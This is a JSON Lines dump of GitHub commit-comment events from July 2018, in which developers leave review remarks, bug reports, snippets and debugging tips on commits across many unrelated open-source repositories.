{"id":"7906961590","type":"CommitCommentEvent","actor":{"login":"EquinoxQuasar"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29567327,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T14:17:00Z","updated_at":"2018-07-02T14:17:00Z","author_association":"NONE","body":"This is actually pretty smart, but you can try doing floor(math.random(1,5)) which will give you about the same XP and you will spend 1/2 of the time 👍 "}},"created_at":"2018-07-02T14:17:00Z"}
{"id":"7906964873","type":"CommitCommentEvent","actor":{"login":"jannekalliola"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29567337,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T14:17:36Z","updated_at":"2018-07-02T14:17:36Z","author_association":"CONTRIBUTOR","body":"Ok, then it might cause it. Can you get a dump of JSON data retrieved from the weather service? Unfortunately, I'm not currently near my mirror (and won't be for a week), so I cannot see the problem or debug this by myself."}},"created_at":"2018-07-02T14:17:36Z"}
{"id":"7906971767","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567351,"position":1,"line":13,"path":"corelibrary/src/main/java/com/axway/ats/core/threads/ImportantThread.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:18:49Z","updated_at":"2018-07-02T14:18:49Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:18:49Z"}
{"id":"7906976568","type":"CommitCommentEvent","actor":{"login":"azuremate"},"repo":{"name":"azuremate/hello-world"},"payload":{"comment":{"id":29567362,"position":null,"line":null,"path":null,"commit_id":"4149f4a90c3de61b75a235f4be966843db2b29b0","created_at":"2018-07-02T14:19:39Z","updated_at":"2018-07-02T14:19:39Z","author_association":"OWNER","body":"코멘트"}},"created_at":"2018-07-02T14:19:39Z"}
{"id":"7906979661","type":"CommitCommentEvent","actor":{"login":"pfrazee"},"repo":{"name":"pfrazee/rpc-websockets"},"payload":{"comment":{"id":29567371,"position":null,"line":null,"path":null,"commit_id":"468e3c5d9088753c5e7effc2d9fa77d22e3d398b","created_at":"2018-07-02T14:20:11Z","updated_at":"2018-07-02T14:20:11Z","author_association":"OWNER","body":"It was useful but I forget *precisely* how I used it. Old code, since removed."}},"created_at":"2018-07-02T14:20:11Z"}
{"id":"7906983390","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567376,"position":1,"line":159,"path":"corelibrary/src/main/java/com/axway/ats/core/utils/ClasspathUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:20:43Z","updated_at":"2018-07-02T14:20:43Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:20:43Z"}
{"id":"7906983736","type":"CommitCommentEvent","actor":{"login":"liedekef"},"repo":{"name":"MISP/MISP"},"payload":{"comment":{"id":29567380,"position":5,"line":3846,"path":"app/Model/Server.php","commit_id":"fe3f2067be0fbfc96955332bc7825edb8d6c5d0a","created_at":"2018-07-02T14:20:46Z","updated_at":"2018-07-02T14:20:46Z","author_association":"NONE","body":"This seems interesting: here the recursive option is used, but in the doc (UPDATE.txt) it doesn't mention that (there 'force' is used, but I assume recursive is the better option)"}},"created_at":"2018-07-02T14:20:46Z"}
{"id":"7906987109","type":"CommitCommentEvent","actor":{"login":"DNewg00"},"repo":{"name":"Mafa029/ICC"},"payload":{"comment":{"id":29567387,"position":null,"line":null,"path":null,"commit_id":"db0bf29c96ec8afb6ec2c23a0fbe4fd07fe355dd","created_at":"2018-07-02T14:21:22Z","updated_at":"2018-07-02T14:21:22Z","author_association":"NONE","body":"Perfect"}},"created_at":"2018-07-02T14:21:22Z"}
{"id":"7906989045","type":"CommitCommentEvent","actor":{"login":"KunvarThaman"},"repo":{"name":"KunvarThaman/Flappy-game"},"payload":{"comment":{"id":29567393,"position":null,"line":null,"path":null,"commit_id":"96ba9d6d3a36440c7ccc3773aceae96d2655c24f","created_at":"2018-07-02T14:21:41Z","updated_at":"2018-07-02T14:21:41Z","author_association":"OWNER","body":"README.md"}},"created_at":"2018-07-02T14:21:41Z"}
{"id":"7906991235","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29567395,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T14:22:05Z","updated_at":"2018-07-02T14:22:05Z","author_association":"OWNER","body":"This is really impressive... I'm very tempted to steal [concept_def.h](https://github.com/facebookresearch/pushmi/blob/master/include/pushmi/detail/concept_def.h) and use it in NanoRange! It's much more sophisticated than what I've been doing."}},"created_at":"2018-07-02T14:22:05Z"}
{"id":"7906992459","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29567397,"position":22,"line":37,"path":"core/descriptors.runtime/src/kotlin/reflect/jvm/internal/components/RuntimePackagePartProvider.kt","commit_id":"9d7b0c460b8c455aa8539aa42fd3c16ffc060fc4","created_at":"2018-07-02T14:22:18Z","updated_at":"2018-07-02T14:22:18Z","author_association":"MEMBER","body":"I can't see the place where `visitedModules` is being modified"}},"created_at":"2018-07-02T14:22:18Z"}
{"id":"7906993693","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567404,"position":1,"line":220,"path":"corelibrary/src/main/java/com/axway/ats/core/utils/HostUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:22:31Z","updated_at":"2018-07-02T14:22:31Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:22:31Z"}
{"id":"7906995034","type":"CommitCommentEvent","actor":{"login":"iglocska"},"repo":{"name":"MISP/MISP"},"payload":{"comment":{"id":29567414,"position":5,"line":3846,"path":"app/Model/Server.php","commit_id":"fe3f2067be0fbfc96955332bc7825edb8d6c5d0a","created_at":"2018-07-02T14:22:44Z","updated_at":"2018-07-02T14:22:44Z","author_association":"MEMBER","body":"Definitely, we should update everything where this isn't the case."}},"created_at":"2018-07-02T14:22:44Z"}
{"id":"7906996965","type":"CommitCommentEvent","actor":{"login":"rsynek"},"repo":{"name":"rsynek/drools"},"payload":{"comment":{"id":29567418,"position":16,"line":323,"path":"drools-persistence/drools-persistence-api/src/main/java/org/drools/persistence/jta/JtaTransactionManager.java","commit_id":"46276dddc315d120c29c3307d3a8f316a5b0c52c","created_at":"2018-07-02T14:23:02Z","updated_at":"2018-07-02T14:23:02Z","author_association":"OWNER","body":"@zhfeng thanks, will retest. Changing the Tx sync back to interposed in PersistableRunner didn't help, it failed tests even with H2."}},"created_at":"2018-07-02T14:23:02Z"}
{"id":"7906998705","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29567420,"position":5,"line":25,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-02T14:23:20Z","updated_at":"2018-07-02T14:23:20Z","author_association":"OWNER","body":"Я согласен, что ref не нужен, т.к. массив является ссылочным типом, убрал его. Все тесты по-прежнему работают. Нужно ли мне заново комитить этот файл?"}},"created_at":"2018-07-02T14:23:20Z"}
{"id":"7906999286","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29567421,"position":null,"line":null,"path":null,"commit_id":"9099d9ab373dbf8a23acc98b43003acb5b674caa","created_at":"2018-07-02T14:23:25Z","updated_at":"2018-07-02T14:23:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-142324 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-142324\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-02T14:23:25Z"}
{"id":"7907000098","type":"CommitCommentEvent","actor":{"login":"plasta"},"repo":{"name":"facebook/redex"},"payload":{"comment":{"id":29567422,"position":null,"line":null,"path":null,"commit_id":"cd58abee6508bac038261fd3706336808a3ce707","created_at":"2018-07-02T14:23:33Z","updated_at":"2018-07-02T14:23:33Z","author_association":"NONE","body":"This also doesn't compile with MSVC "}},"created_at":"2018-07-02T14:23:33Z"}
{"id":"7907002518","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567431,"position":1,"line":31,"path":"corelibrary/src/main/java/com/axway/ats/core/utils/StringUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:23:58Z","updated_at":"2018-07-02T14:23:58Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:23:58Z"}
{"id":"7907003486","type":"CommitCommentEvent","actor":{"login":"shp318"},"repo":{"name":"igormcoelho/simple-pycuda"},"payload":{"comment":{"id":29567435,"position":39,"line":310,"path":"simplepycuda.py","commit_id":"f8e5e46765a987158f8147845a0e435228c1f252","created_at":"2018-07-02T14:24:09Z","updated_at":"2018-07-02T14:24:09Z","author_association":"NONE","body":"name 'function_name' is not defined"}},"created_at":"2018-07-02T14:24:09Z"}
{"id":"7907004260","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29567436,"position":null,"line":null,"path":null,"commit_id":"002aa88a97ed8a1c51f4ab1c965d22d064ea30a8","created_at":"2018-07-02T14:24:16Z","updated_at":"2018-07-02T14:24:16Z","author_association":"MEMBER","body":"The 2016.11 release cycle is no longer receiving non-CVE fixes. Furthermore, changes to something fundamental like YAML loading are something we reserve for major releases, where any lingering issues can be worked out in the develop branch and are less likely to cause regressions in a point release."}},"created_at":"2018-07-02T14:24:16Z"}
{"id":"7907004972","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567439,"position":1,"line":41,"path":"corelibrary/src/main/java/com/axway/ats/core/validation/types/TypeRegex.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:24:22Z","updated_at":"2018-07-02T14:24:22Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:24:22Z"}
{"id":"7907005113","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29567440,"position":11,"line":27,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-02T14:24:24Z","updated_at":"2018-07-02T14:24:24Z","author_association":"OWNER","body":"Условие if ( start < end) обязательно, т.к. при вызове рекурсии в параметрах будут лежат такие start и end, что start > end. Короче говоря я не описывал исключение этим ifом, это часть моей реализации задания)."}},"created_at":"2018-07-02T14:24:24Z"}
{"id":"7907006865","type":"CommitCommentEvent","actor":{"login":"berlincount"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29567448,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T14:24:41Z","updated_at":"2018-07-02T14:24:41Z","author_association":"CONTRIBUTOR","body":"I tired using `console.log()`, but for some reason nothing from the `weatherforceast` module shows up in the log - not even the Startup message. I'll have to look into this later, but someone else might be faster.\r\n\r\nI linked to this commit on https://github.com/MichMich/MagicMirror/issues/1332"}},"created_at":"2018-07-02T14:24:41Z"}
{"id":"7907007678","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567450,"position":1,"line":28,"path":"corelibrary/src/test/java/com/axway/ats/core/dbaccess/Test_DatabaseProviderFactory_createDbConnection.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:24:50Z","updated_at":"2018-07-02T14:24:50Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:24:50Z"}
{"id":"7907028002","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29567507,"position":10,"line":10,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T14:28:17Z","updated_at":"2018-07-02T14:28:17Z","author_association":"NONE","body":"This actually worked for me. I just commented it out while I was running the other code. I should have made that clear! I'll be better about correct formatting."}},"created_at":"2018-07-02T14:28:17Z"}
{"id":"7907028613","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29567508,"position":23,"line":23,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T14:28:23Z","updated_at":"2018-07-02T14:28:23Z","author_association":"NONE","body":"My \"problem\" was poorly worded. I suppose I should have said, \"Using title function and handing caps after apostrophes. The code grabbed the code above that which was commented out, and it ran fine. Again, I'll be more clear when sending solutions. Apologies."}},"created_at":"2018-07-02T14:28:23Z"}
{"id":"7907031553","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29567514,"position":52,"line":60,"path":"core/descriptors.runtime/src/kotlin/reflect/jvm/internal/components/RuntimePackagePartProvider.kt","commit_id":"9d7b0c460b8c455aa8539aa42fd3c16ffc060fc4","created_at":"2018-07-02T14:28:51Z","updated_at":"2018-07-02T14:28:51Z","author_association":"MEMBER","body":"BTW, it seems like if both function are synchronized then `packageParts` can be a plain hash map"}},"created_at":"2018-07-02T14:28:51Z"}
{"id":"7907032988","type":"CommitCommentEvent","actor":{"login":"KvanTTT"},"repo":{"name":"antlr/grammars-v4"},"payload":{"comment":{"id":29567517,"position":null,"line":null,"path":null,"commit_id":"44aa3b6bebeec9b29397eb7cf5866597ddc19e7e","created_at":"2018-07-02T14:29:05Z","updated_at":"2018-07-02T14:29:05Z","author_association":"MEMBER","body":"@Endeavourl please read this discussion https://github.com/antlr/antlr4/pull/2046 and this doc [Case-Insensitive Lexing](https://github.com/antlr/antlr4/blob/master/doc/case-insensitive-lexing.md)."}},"created_at":"2018-07-02T14:29:05Z"}
{"id":"7907034295","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567524,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:29:17Z","updated_at":"2018-07-02T14:29:17Z","author_association":"OWNER","body":"Same confusion I'm having now. So we're at the same class"}},"created_at":"2018-07-02T14:29:17Z"}
{"id":"7907036374","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29567528,"position":24,"line":39,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/GeneratedClassLoader.java","commit_id":"9d7b0c460b8c455aa8539aa42fd3c16ffc060fc4","created_at":"2018-07-02T14:29:38Z","updated_at":"2018-07-02T14:29:38Z","author_association":"MEMBER","body":"Am I right that this change is only necessary for tests?"}},"created_at":"2018-07-02T14:29:38Z"}
{"id":"7907036576","type":"CommitCommentEvent","actor":{"login":"imagejan"},"repo":{"name":"ijpb/MorphoLibJ"},"payload":{"comment":{"id":29567530,"position":null,"line":null,"path":null,"commit_id":"4d2700302c023906e212af3aa5f3c3f0a2078c19","created_at":"2018-07-02T14:29:40Z","updated_at":"2018-07-02T14:29:40Z","author_association":"CONTRIBUTOR","body":"@iarganda did you know you can use [`release-version.sh`](https://github.com/scijava/scijava-scripts/blob/6f1e13126c781e0fbe386863737e0be0e56cc914/release-version.sh) to make releases? No need to use double-push any more :-)\r\n\r\nSee https://imagej.net/Development_Lifecycle#Phase_3:_Released\r\n"}},"created_at":"2018-07-02T14:29:40Z"}
{"id":"7907038384","type":"CommitCommentEvent","actor":{"login":"lenormf"},"repo":{"name":"mawww/kakoune"},"payload":{"comment":{"id":29567532,"position":20,"line":100,"path":"rc/extra/git-tools.kak","commit_id":"379e7c2d2d0968ad654e8e60b7164e175d66624c","created_at":"2018-07-02T14:29:58Z","updated_at":"2018-07-02T14:29:58Z","author_association":"CONTRIBUTOR","body":"Or you could use `git rev-parse --show-toplevel` to check that the current buffer is part of a `git` repository first, and then set the hook."}},"created_at":"2018-07-02T14:29:58Z"}
{"id":"7907040934","type":"CommitCommentEvent","actor":{"login":"rasple"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29567541,"position":null,"line":null,"path":null,"commit_id":"508f0bf82f5d0b0dc316d51019d3a5d1e8abaecb","created_at":"2018-07-02T14:30:24Z","updated_at":"2018-07-02T14:30:24Z","author_association":"OWNER","body":"Erster!111!!111Einself"}},"created_at":"2018-07-02T14:30:24Z"}
{"id":"7907041215","type":"CommitCommentEvent","actor":{"login":"adamhooper"},"repo":{"name":"CJWorkbench/cjworkbench"},"payload":{"comment":{"id":29567542,"position":23,"line":91,"path":"server/tests/test_workflow_views.py","commit_id":"8857a52a9a50211b746ae76aef883439e2e19cf8","created_at":"2018-07-02T14:30:26Z","updated_at":"2018-07-02T14:30:26Z","author_association":"CONTRIBUTOR","body":"Perhaps I'm thinking of `server/views/WfModule.py`: for instance, `wfmodule_output()` would return HttpResonseNotFound when the module doesn't exist and HttpResponseForbidden when not accessible; `wfmodule_dataversion()` would return HttpResponseNotFound in either case with `GET` but HttpResponseForbidden when not allowed with `PATCH`. And so on. I made that behavior consistent in commit 35d1e29f678f3c5abe85e629e689e89dacd5b043, June 18, by creating two helper methods (`_lookup_wf_module_for_read()` and `_lookup_wf_module_for_write()`) and using them throughout the file.\r\n\r\nI didn't have some grand vision when I did that; I figured I wasn't _adding_ a security vulnerability because the 404/403 dichotomy already existed at some endpoints, and therefore we weren't being secure in presenting 404 exclusively at other endpoints.\r\n\r\nSo that's what I did, and why I felt it didn't add security problems. Perhaps our behavior with WfModule IDs is different than that of Workflow IDs and we actually _didn't_ present 403s with Workflow IDs at any endpoint, in which case I jumped the gun accidentally.\r\n\r\nAs for my opinion: we was at SRCCON that 404s confuse users when they're performing legitimate activities -- a 404 momentarily confused _you_ during the presentation :). So in my opinion, we should use 403 when appropriate."}},"created_at":"2018-07-02T14:30:26Z"}
{"id":"7907042034","type":"CommitCommentEvent","actor":{"login":"codedust"},"repo":{"name":"freifunk-ffm/gluon-firmware-wizard"},"payload":{"comment":{"id":29567543,"position":null,"line":null,"path":null,"commit_id":"a93f95dfec4175dc5dfa343eb55703852c037924","created_at":"2018-07-02T14:30:34Z","updated_at":"2018-07-02T14:30:34Z","author_association":"NONE","body":"> Und genau das wäre eine von mehren Möglichkeiten, die man mal durchsprechen/durchspielen sollte, ob es da nicht einen kompromissbehafteten Lösungsansatz gibt.\r\n\r\nAktuell kann man die Firmware aller Geräte noch in der tabellarischen Übersicht herunterladen. Primärer Gedanke der Config-Option `enabled_device_categories` war, dass Leute nicht mehr so einfach über veraltete Geräte stolpern und dann lieber noch einmal nachfragen, bevor sie sich diese Hardware beschaffen. Wenn wir Firmware für ein Gerät auf der Startseite des Firmware-Selektors anbieten, erweckt das bei einigen Menschen den Eindruck, dass es eine gute Idee ist, sich diese Geräte zu kaufen.\r\n\r\n> @ALL: Was glaubt Ihr, wieviele Leute aus der Frankfurter Community hier auf einen Beiträge eines Code-Commits des Frankfuret Firmware-Wizard aufmerksam werden?\r\n\r\nDie Reichweite hier ist sicherlich nicht so hoch, wie auf einer Mailingliste oder auf einem Community-Treffen. Daher ist das hier auch imho nicht der richtige Ort, um den Konsens auf dem letzten Hessen-Meetup noch einmal zu überdenken. Das sollte woanders passieren. Ich hoffe aber, die Bedenken mit der Config-Option hiermit ausgeräumt zu haben. Es geht ja eben gerade *nicht* darum, bestehende Geräte, die aktuell schon genutzt werden, aus dem Netz zu verbannen, sondern lediglich darum, Neuanschaffungen zu vermeiden."}},"created_at":"2018-07-02T14:30:34Z"}
{"id":"7907047022","type":"CommitCommentEvent","actor":{"login":"pavannayak321"},"repo":{"name":"goxr3plus/JavaFX-Web-Browser"},"payload":{"comment":{"id":29567550,"position":null,"line":null,"path":null,"commit_id":"d89a8b43709fefe4575c1416d6de36ddd6502992","created_at":"2018-07-02T14:31:24Z","updated_at":"2018-07-02T14:31:24Z","author_association":"NONE","body":"thanks bro ..but you used   @FXML      Annotation in project what is the\nmeaning of that\n\nOn Sun, Jul 1, 2018 at 12:56 AM, GOXR3PLUS STUDIO <notifications@github.com>\nwrote:\n\n> Ou plain JavaFX, no extra frameworks :)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/goxr3plus/JavaFX-Web-Browser/commit/d89a8b43709fefe4575c1416d6de36ddd6502992#commitcomment-29555236>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Ai-UZSe4b6r74mNUIYBQrqXv_gNd7Uawks5uB9D6gaJpZM4UAu01>\n> .\n>\n"}},"created_at":"2018-07-02T14:31:24Z"}
{"id":"7907047561","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567553,"position":1,"line":23,"path":"log/src/main/java/com/axway/ats/log/AtsDbLogger.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:31:30Z","updated_at":"2018-07-02T14:31:30Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:31:30Z"}
{"id":"7907048990","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567555,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:31:45Z","updated_at":"2018-07-02T14:31:45Z","author_association":"CONTRIBUTOR","body":"So. I currently focus on other things, using patched libui. No progress."}},"created_at":"2018-07-02T14:31:45Z"}
{"id":"7907052067","type":"CommitCommentEvent","actor":{"login":"Pyohwan"},"repo":{"name":"JakduK/jakduk-web"},"payload":{"comment":{"id":29567564,"position":null,"line":null,"path":null,"commit_id":"37a5a7151a2a4b2266cce8e3af2fcf9f2e58b61a","created_at":"2018-07-02T14:32:18Z","updated_at":"2018-07-02T14:32:18Z","author_association":"MEMBER","body":"여긴 왜 몽땅 날라가는거죠?"}},"created_at":"2018-07-02T14:32:18Z"}
{"id":"7907052445","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29567565,"position":10,"line":10,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T14:32:22Z","updated_at":"2018-07-02T14:32:22Z","author_association":"NONE","body":"#Method One (from file):\r\nhiking = [\"devil's den\", \"old lady\", \"north rim\", \"where angel's fly\"]\r\nprint(hiking)\r\nhiking.append(\"martin's trail\")\r\nhiking_string = \", \".join(hiking)\r\ncapped_hiking = hiking_string.title()\r\nprint(capped_hiking.replace('S', 's'))"}},"created_at":"2018-07-02T14:32:22Z"}
{"id":"7907053910","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"ncox2011/contact-list"},"payload":{"comment":{"id":29567569,"position":null,"line":null,"path":null,"commit_id":"a0352cc9190d251df90db074e598b412b4f2d8ca","created_at":"2018-07-02T14:32:37Z","updated_at":"2018-07-02T14:32:37Z","author_association":"NONE","body":"For some reason, I can't get it to compile a bundle.js because I am getting a grunt error that won't let the rest proceed! Can you fix whatever is giving that error? This is what I'm seeing:\r\n```contact-list\\src\\scripts\\Contact.js\r\n  16:4  error  Parsing error: Unexpected token <<```"}},"created_at":"2018-07-02T14:32:37Z"}
{"id":"7907056409","type":"CommitCommentEvent","actor":{"login":"davidcava"},"repo":{"name":"davidcava/shadowsocks-libev-dsm"},"payload":{"comment":{"id":29567575,"position":null,"line":null,"path":null,"commit_id":"9a2b727c8128d8432ba756304b09ba1621a0cffd","created_at":"2018-07-02T14:33:03Z","updated_at":"2018-07-02T14:33:03Z","author_association":"OWNER","body":"ok, so not working :-(\r\nFirst double-check that the process is indeed not started by:\r\nps -aef | grep ss-\r\n\r\nThen we can try  a bit of debug. See what error pops-up when launching manually:\r\nexport LD_LIBRARY_PATH=/var/packages/shadowsocks-libev/target/lib\r\n/var/packages/shadowsocks-libev/target/bin/ss-local -c /var/packages/shadowsocks-libev/etc/ss-local.json"}},"created_at":"2018-07-02T14:33:03Z"}
{"id":"7907057112","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567576,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:33:11Z","updated_at":"2018-07-02T14:33:11Z","author_association":"OWNER","body":"Can you try with RIL? I got signals now with AOSP-built HIDL libril"}},"created_at":"2018-07-02T14:33:11Z"}
{"id":"7907058303","type":"CommitCommentEvent","actor":{"login":"ocket8888"},"repo":{"name":"ocket8888/mgl"},"payload":{"comment":{"id":29567577,"position":null,"line":null,"path":null,"commit_id":"99df5a8a80cd33c90f76217e4e8d5bbcb78cd6af","created_at":"2018-07-02T14:33:23Z","updated_at":"2018-07-02T14:33:23Z","author_association":"OWNER","body":"Maybe. I guess I can also just make a target for dynamic vs static linking and compare the two. Frankly, it's not static vs dynamic that concerns me. I hope to make the build tree such that `make -j` is much faster than just `make`, and such that recompilation is 'smart' enough to only build changed pieces. It may well be that once I've done so you won't want it because it's too slow and/or produces too large of an end binary, but I honestly don't know enough about C++ to be able to conjecture further. I think it'll be easiest to just do it and then see if what comes out is any good."}},"created_at":"2018-07-02T14:33:23Z"}
{"id":"7907061271","type":"CommitCommentEvent","actor":{"login":"burntsun"},"repo":{"name":"DiscipleTools/disciple-tools-theme"},"payload":{"comment":{"id":29567588,"position":5,"line":102,"path":"dt-notifications/hooks/class-hook-comments.php","commit_id":"f0c6288e9e2b450c257b924dca683fbe291e54db","created_at":"2018-07-02T14:33:55Z","updated_at":"2018-07-02T14:33:55Z","author_association":"CONTRIBUTOR","body":"Small translation note: it would be better if the marked string included the post ID, like this:\r\n\r\n```php\r\nsprintf( __( \"You were mentioned on contact %s\", 'disciple_tools' ), $post_id ) \r\n```\r\n\r\nThis way, the translator is free to move the post ID to any position in the string."}},"created_at":"2018-07-02T14:33:55Z"}
{"id":"7907061769","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29567590,"position":10,"line":10,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T14:34:01Z","updated_at":"2018-07-02T14:34:01Z","author_association":"NONE","body":"# Method Two (from file sent) -actually 'One' should be 'Two' and 'Two' should be 'One'hiking = [\"devil's den\", \"old lady\", \"north rim\", \"where angel's fly\"]\r\nprint(hiking)\r\nhiking.append(\"martin's trail\")\r\nprint(hiking)\r\nimport string\r\nhiking_capped = \", \".join(hiking)\r\nstring.capwords(hiking_capped)\r\nprint(string.capwords(hiking_capped))"}},"created_at":"2018-07-02T14:34:01Z"}
{"id":"7907066720","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567598,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:34:54Z","updated_at":"2018-07-02T14:34:54Z","author_association":"CONTRIBUTOR","body":"My rild cannot even run! Yours?"}},"created_at":"2018-07-02T14:34:54Z"}
{"id":"7907067337","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567600,"position":1,"line":16,"path":"log/src/main/java/com/axway/ats/log/appenders/AbstractDbAppender.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:35:01Z","updated_at":"2018-07-02T14:35:01Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:35:01Z"}
